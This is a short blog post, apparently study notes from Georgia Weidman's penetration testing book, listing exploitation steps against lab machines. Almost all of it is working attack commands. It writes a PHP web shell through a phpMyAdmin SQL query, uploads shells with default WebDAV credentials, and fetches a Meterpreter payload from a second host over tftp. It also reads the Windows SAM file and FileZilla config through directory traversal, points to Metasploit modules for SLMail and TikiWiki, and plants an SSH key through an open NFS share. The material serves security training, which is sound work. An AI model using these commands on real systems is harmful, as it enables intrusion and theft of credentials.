Source: Georgia Weidman on "Advanced Penetration Test" (1) Webdav Default Credentials Default -> wampp:xampp a. cadaver http://192.168.0.190/webdav b. Use Msfvenom to create a PHP shell and upload c. Use msfconsole to exploit (2) Open phpMyAdmin a. Create a php shell on the Apache server using a SQL query SELECT "“”<?php system($_GET['cmd']); ?>””" into outfile "C:\\xampp\\htdocs\\shell.php" http://192.168.0.190/shell.php?cmd=ipconfig b. Add a meterpreter PHP file http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php (3) Downloading Sensitive Files
Zervit 0.4 directory traversal nc 192.168.20.10 3232 GET /../../../../../boot.ini HTTP/1.1 http://192.168.0.190:3232/index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml http://192.168.0.190:3232/index.html?../../../../../../WINDOWS/repair/sam (4) Exploiting a Buffer Overflow Buffer overflow in SLMail windows/pop3/seattlelab_pass (5) Exploiting a Web Application Unsanitized parameter in graph_formula.php -> PHP code execution unix/webapp/tikiwiki_graph_formula_exec (6) Piggybacking on a Compromised Service VsFTP -> backdoored Username ending in a :) spawned a backdoor on port 6200 (7) Exploiting Open NFS Shares NFS on port 2049 showmount –e 172.16.85.136 ssh-keygen mkdir /tmp/r00t/ mount -t nfs –o nolock 172.16.85.136:/export/username/ /tmp/r00t/ cat ~/.ssh/id_rsa.pub >> /tmp/r00t/.ssh/authorized_keys umount /tmp/r00t/
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
July 2016
Categories |